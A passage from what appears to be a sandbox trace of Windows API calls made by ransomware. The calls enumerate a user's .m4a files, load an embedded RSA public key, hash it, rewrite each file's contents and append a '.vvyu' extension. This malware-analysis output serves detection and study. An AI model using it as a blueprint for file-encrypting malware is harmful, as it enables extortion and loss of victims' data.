out: hHeap=0x620000) returned 1 [0203.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e70 | out: hHeap=0x620000) returned 1 [0203.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.203] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xec6e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xec6e, lpOverlapped=0x0) returned 1 [0203.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.205] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xec73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.205] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.207] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.207] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.207] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.207] CloseHandle (hObject=0x510) returned 1 [0203.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0203.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.210] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\4GN5BaMTH.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\4gn5bamth.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\4GN5BaMTH.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\4gn5bamth.m4a.vvyu")) returned 1 [0203.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.211] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.215] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ec6b80, ftCreationTime.dwHighDateTime=0x1d8a418, ftLastAccessTime.dwLowDateTime=0x7b3c1400, ftLastAccessTime.dwHighDateTime=0x1d8a67c, ftLastWriteTime.dwLowDateTime=0x7b3c1400, ftLastWriteTime.dwHighDateTime=0x1d8a67c, nFileSizeHigh=0x0, nFileSizeLow=0x6538, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6y-Gle7CJ.m4a", cAlternateFileName="6Y-GLE~1.M4A")) returned 1 [0203.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.215] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\6y-Gle7CJ.m4a") returned=".m4a" [0203.215] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\6y-Gle7CJ.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\6y-gle7cj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.216] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=25912) returned 1 [0203.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.220] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x6512, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.220] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.222] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.222] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6538, lpOverlapped=0x0) returned 1 [0203.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.223] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.225] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.225] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.225] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.225] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.225] GetLastError () returned 0x0 [0203.225] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.225] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.225] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.225] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.226] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6540) returned 0x2ea99b0 [0203.226] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1e70 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1eb8 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.227] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0203.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0203.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3770 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.231] GetCurrentThreadId () returned 0x66c [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3b10 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.231] GetCurrentThreadId () returned 0x66c [0203.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0203.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: 